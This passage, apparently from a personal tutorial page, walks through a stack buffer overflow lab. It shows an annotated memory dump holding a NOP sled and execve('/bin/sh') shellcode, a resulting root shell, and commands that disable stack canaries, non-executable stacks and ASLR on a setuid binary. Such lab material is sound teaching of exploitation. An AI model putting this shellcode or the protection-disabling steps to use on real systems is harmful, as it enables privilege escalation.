0xbffff9d0: 0x90909090
0xbffff9cc: 0x90909090
0xbffff9c8: 0x90909090
0xbffff9c4: 0x90909090
0xbffff9c0: 0x90909090
0xbffff9bc: 0x90909090
0xbffff9b8: 0x90909090
0xbffff9b4: 0x90909090
0xbffff9b0: 0x90909090
0xbffff9ac: 0x90909090
0xbffff9a8: 0x90909090
0xbffff9a4: 0x90909090
0xbffff9a0: 0x90909090
0xbffff99c: 0x90909090
0xbffff998: 0x90909090
0xbffff994: 0x90909090
0xbffff990: 0x90909090
0xbffff98c: 0x90909090
0xbffff988: 0x90909090
0xbffff984: 0x90909090
0xbffff980: 0x90909090
0xbffff97c: 0x90909090
0xbffff978: 0x90909090
0xbffff974: 0x90909090
0xbffff970: 0x90909090
0xbffff96c: 0x90909090
0xbffff968: 0x90909090
0xbffff964: 0x90909090
0xbffff960: 0x90909090
0xbffff95c: 0x90909090
0xbffff958: 0x90909090
0xbffff954: 0x90909090
0xbffff950: 0x90909090
0xbffff94c: 0x90909090
0xbffff948: 0x9090006c
0xbffff944: 0x61636f6c
0xbffff940: 0x2d6e6c75
0xbffff93c: 0x76000000
0xbffff938: 0x00000000
0xbffff934: 0x00000000
0xbffff930: 0x00000000
0xbffff92c: 0x00363836
0xbffff928: 0x69000000
0xbffff924: 0x00000000
0xbffff920: 0x00000000
0xbffff91c: 0x00000000
0xbffff918: 0x00000000
0xbffff914: 0xbffff92b
0xbffff910: 0x0000000f
0xbffff90c: 0x00000001
0xbffff908: 0x00000017
0xbffff904: 0x00000000
0xbffff900: 0x0000000e
0xbffff8fc: 0x000003e8
0xbffff8f8: 0x0000000d
0xbffff8f4: 0x00000000
0xbffff8f0: 0x0000000c
0xbffff8ec: 0x000003e8
0xbffff8e8: 0x0000000b
0xbffff8e4: 0x080482f0
0xbffff8e0: 0x00000009
0xbffff8dc: 0x00000000
0xbffff8d8: 0x00000008
0xbffff8d4: 0xb7fe7000
0xbffff8d0: 0x00000007
0xbffff8cc: 0x00000007
0xbffff8c8: 0x00000005
0xbffff8c4: 0x00000020
0xbffff8c0: 0x00000004
0xbffff8bc: 0x08048034
0xbffff8b8: 0x00000003
0xbffff8b4: 0x00000064
0xbffff8b0: 0x00000011
0xbffff8ac: 0x00001000
0xbffff8a8: 0x00000006
0xbffff8a4: 0x178bfbff
0xbffff8a0: 0x00000010
0xbffff89c: 0xffffe000
0xbffff898: 0x00000021
0xbffff894: 0xffffe400
0xbffff890: 0x00000020
0xbffff88c: 0x00000000
0xbffff888: 0xbfffffcf
0xbffff884: 0xbfffffba
0xbffff880: 0xbfffff98
0xbffff87c: 0xbfffff78
0xbffff878: 0xbfffff45
0xbffff874: 0xbfffff35
0xbffff870: 0xbfffff22
0xbffff86c: 0xbfffff1a
0xbffff868: 0xbfffff03
0xbffff864: 0xbffffef2
0xbffff860: 0xbffffede
0xbffff85c: 0xbffffe91
0xbffff858: 0xbffffe7a
0xbffff854: 0xbffffbff
0xbffff850: 0xbffffbf2
0xbffff84c: 0xbffffbdf
0xbffff848: 0xbffffbbd
0xbffff844: 0xbffffbad
0xbffff840: 0xbffffba2
0xbffff83c: 0x00000000
0xbffff838: 0xbffff94a // vuln-32.c &argv[1]
0xbffff834: 0xbffff93f
0xbffff830: 0x00000002
0xbffff82c: 0xb7ffe9fd
0xbffff828: 0xbffff82c
0xbffff824: 0xb7ff47b0
0xbffff820: 0x08048a40
0xbffff81c: 0x08048a50
0xbffff818: 0xbffff834
0xbffff814: 0x00000002
0xbffff810: 0x08048918
0xbffff80c: 0x08048311
0xbffff808: 0x00000000
0xbffff804: 0x080482f0
0xbffff800: 0x00000002
0xbffff7fc: 0xb8000ff4
0xbffff7f8: 0xb7eafded
0xbffff7f4: 0xb7ff9300
0xbffff7f0: 0x00000000
0xbffff7ec: 0x00000000
0xbffff7e8: 0x00000000
0xbffff7e4: 0x48e0fe81
0xbffff7e0: 0x40f5f7b0
0xbffff7dc: 0xbffff808
0xbffff7d8: 0x00000000
0xbffff7d4: 0xb8000ce0
0xbffff7d0: 0xb7fd6ff4
0xbffff7cc: 0x00000000
0xbffff7c8: 0x00000001
0xbffff7c4: 0x00fff9fc
0xbffff7c0: 0xbffff9fc
0xbffff7bc: 0xbffff9fc
0xbffff7b8: 0xbffff9fc
0xbffff7b4: 0xbffff9fc
0xbffff7b0: 0xbffff9fc
0xbffff7ac: 0xbffff9fc
0xbffff7a8: 0xbffff9fc // main() EBP.
0xbffff7a4: 0xbffff9fc
0xbffff7a0: 0xbffff9fc
0xbffff79c: 0xbffff9fc
0xbffff798: 0xbffff9fc
0xbffff794: 0xbffff9fc
0xbffff790: 0xbffff9fc // main() ESP.
0xbffff78c: 0xbffff9fc // main() return address (EIP).
0xbffff788: 0xbffff9fc // copy_wrapper() EBP.
0xbffff784: 0xbffff9fc
0xbffff780: 0xbffff9fc
0xbffff77c: 0xbffff9fc // copy_wrapper() &ebp.
0xbffff778: 0xbffff9fc
0xbffff774: 0xbffff9fc
0xbffff770: 0xbffff9fc
0xbffff76c: 0xbffff9fc
0xbffff768: 0xbffff9fc
0xbffff764: 0xbffff9fc
0xbffff760: 0xbffff9fc // End of copy_wrapper() &buffer.
0xbffff75c: 0xbffff9fc
0xbffff758: 0xbffff9fc
0xbffff754: 0xbffff9fc
0xbffff750: 0xbffff9fc
0xbffff74c: 0xbffff9fc
0xbffff748: 0xbffff9fc
0xbffff744: 0xbffff9fc
0xbffff740: 0xbffff9fc
0xbffff73c: 0xbffff9fc
0xbffff738: 0xbffff9fc
0xbffff734: 0xbffff9fc
0xbffff730: 0xbffff9fc
0xbffff72c: 0xbffff9fc
0xbffff728: 0xbffff9fc
0xbffff724: 0xbffff9fc
0xbffff720: 0xbffff9fc
0xbffff71c: 0xbffff9fc
0xbffff718: 0xbffff9fc
0xbffff714: 0xbffff9fc
0xbffff710: 0xbffff9fc
0xbffff70c: 0xbffff9fc
0xbffff708: 0xbffff9fc
0xbffff704: 0xbffff9fc
0xbffff700: 0xbffff9fc
0xbffff6fc: 0xbffff9fc
0xbffff6f8: 0xbffff9fc
0xbffff6f4: 0xbffff9fc
0xbffff6f0: 0xbffff9fc
0xbffff6ec: 0xbffff9fc
0xbffff6e8: 0xbffff9fc
0xbffff6e4: 0xbffff9fc
0xbffff6e0: 0xbffff9fc
0xbffff6dc: 0xbffff9fc
0xbffff6d8: 0xbffff9fc
0xbffff6d4: 0xbffff9fc
0xbffff6d0: 0xbffff9fc
0xbffff6cc: 0xbffff9fc
0xbffff6c8: 0xbffff9fc
0xbffff6c4: 0xbffff9fc
0xbffff6c0: 0xbffff9fc
0xbffff6bc: 0xbffff9fc
0xbffff6b8: 0xbffff9fc
0xbffff6b4: 0xbffff9fc
0xbffff6b0: 0xbffff9fc
0xbffff6ac: 0xbffff9fc
0xbffff6a8: 0xbffff9fc
0xbffff6a4: 0xbffff9fc
0xbffff6a0: 0xbffff9fc
0xbffff69c: 0xbffff9fc
0xbffff698: 0xbffff9fc
0xbffff694: 0xbffff9fc
0xbffff690: 0xbffff9fc
0xbffff68c: 0xbffff9fc
0xbffff688: 0xbffff9fc
0xbffff684: 0xbffff9fc
0xbffff680: 0xbffff9fc
0xbffff67c: 0xbffff9fc
0xbffff678: 0xbffff9fc
0xbffff674: 0xbffff9fc
0xbffff670: 0xbffff9fc
0xbffff66c: 0xbffff9fc
0xbffff668: 0xbffff9fc
0xbffff664: 0xbffff9fc
0xbffff660: 0xbffff9fc
0xbffff65c: 0xbffff9fc
0xbffff658: 0xbffff980
0xbffff654: 0xcde18953
0xbffff650: 0x52e3896e
0xbffff64c: 0x69622f68
0xbffff648: 0x68732f2f
0xbffff644: 0x6852580b
0xbffff640: 0x6ad23180
0xbffff63c: 0xcdc931db
0xbffff638: 0x3158466a
0xbffff634: 0x90909090
0xbffff630: 0x90909090
0xbffff62c: 0x90909090
0xbffff628: 0x90909090
0xbffff624: 0x90909090
0xbffff620: 0x90909090
0xbffff61c: 0x90909090
0xbffff618: 0x90909090
0xbffff614: 0x90909090
0xbffff610: 0x90909090
0xbffff60c: 0x90909090
0xbffff608: 0x90909090
0xbffff604: 0x90909090
0xbffff600: 0x90909090
0xbffff5fc: 0x90909090
0xbffff5f8: 0x90909090
0xbffff5f4: 0x90909090
0xbffff5f0: 0x90909090
0xbffff5ec: 0x90909090
0xbffff5e8: 0x90909090
0xbffff5e4: 0x90909090
0xbffff5e0: 0x90909090
0xbffff5dc: 0x90909090
0xbffff5d8: 0x90909090
0xbffff5d4: 0x90909090
0xbffff5d0: 0x90909090
0xbffff5cc: 0x90909090
0xbffff5c8: 0x90909090
0xbffff5c4: 0x90909090
0xbffff5c0: 0x90909090
0xbffff5bc: 0x90909090
0xbffff5b8: 0x90909090
0xbffff5b4: 0x90909090
0xbffff5b0: 0x90909090
0xbffff5ac: 0x90909090
0xbffff5a8: 0x90909090
0xbffff5a4: 0x90909090
0xbffff5a0: 0x90909090
0xbffff59c: 0x90909090
0xbffff598: 0x90909090
0xbffff594: 0x90909090
0xbffff590: 0x90909090
0xbffff58c: 0x90909090
0xbffff588: 0x90909090
0xbffff584: 0x90909090
0xbffff580: 0x90909090
0xbffff57c: 0x90909090
0xbffff578: 0x90909090
0xbffff574: 0x90909090
0xbffff570: 0x90909090 // Start of copy_wrapper() &buffer.
0xbffff56c: 0x00040000
0xbffff568: 0xbffffa00
0xbffff564: 0xbffff564
0xbffff560: 0x00000000
0xbffff55c: 0xbffff550
0xbffff558: 0xbffff550
0xbffff554: 0xbffff558
0xbffff550: 0x08048b40 // copy_wrapper() ESP.
0xbffff550: copy_wrapper() esp
// At this point copy_wrapper() will return to main, the address stored at
sh-3.2# whoami
root
sh-3.2# exit
exit
bensley@htaroe:~/c $
On the host machine running Ubuntu 16.0.4 (Kernel 4.4.0-36-generic and gcc 5.4.0-6) the two programs won’t compile and execute successfully. Firstly they need to be translated to 64 bit. But in addition to that present day Linux and gcc have more protection mechanisms built in.
By default GCC is enabling stack protection, adding/removing the -fstack-protector compile flag makes no change to the compiled code. It include a stack canary as can be seen here at the return from mem_copy() to main():
$ gcc vuln-64.c -ftrapv -pedantic -fstack-protector -masm=intel -S
$ cat vuln-64.s
.file "vuln-64.c"
.intel_syntax noprefix
.section .rodata
...
copy_wrapper:
.LFB3:
...
je .L25
call __stack_chk_fail
Stack canaries can be seen in the assembly code. The stack protection can be disabled with the -fno-stack-protector flag. This reveals no stack protection in the assembly code:
$ gcc vuln-64.c -ftrapv -pedantic -fno-stack-protector -masm=intel -S
$ cat vuln-64.s
.file "vuln-64.c"
.intel_syntax noprefix
.section .rodata
...
copy_wrapper:
.LFB3:
...
pop rbp
.cfi_def_cfa 7, 8
ret
Execution of code stored on the stack is disabled. This must be explicitly permitted:
gcc vuln-64.c -ftrapv -pedantic -fno-stack-protector -o vuln-64 sudo chown root:root vuln-64 && sudo chmod +s vuln-64 && sudo execstack -s vuln-64
Further to this modern Linux kernels have ASLR enabled by default. Address Space Layout Randomization makes it difficult to know where key data will be stored in memory because it is random arranged.
# Disable ASLR cat /proc/sys/kernel/randomize_va_space 2 sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space" cat /proc/sys/kernel/randomize_va_space 0
In theory the 64 bit exploit should now work but there is till on more problem. This example exploit technique builds up a malicious exploit-string and then passes it as a CLI arg to the vulnerable program. If there is a byte anywhere in the string with a value of 0 that will terminate the string since C strings are NULL terminated. On a 64 bit system it is very likely that some data will be stored at a location with a zero in the address location, for example 0x1234000012345678. Trying to embed that value into the string which is passed as a CLI arg to the vulnerable program means the string would terminate after the 0012345678 and the 123400 would be missing (and everything else after it too, note the endianness!). When running the 32 bit example there were a few rare occurrences when the pointer in exploit-32 called "buffer" was allocated to such as address like 0xbfff0012. The VM had to be rebooted so that the memory was "shuffled" and a new address was used which didn't contain a zero.
Previous page: Reading
Next page: ICMP Messages (Frequency)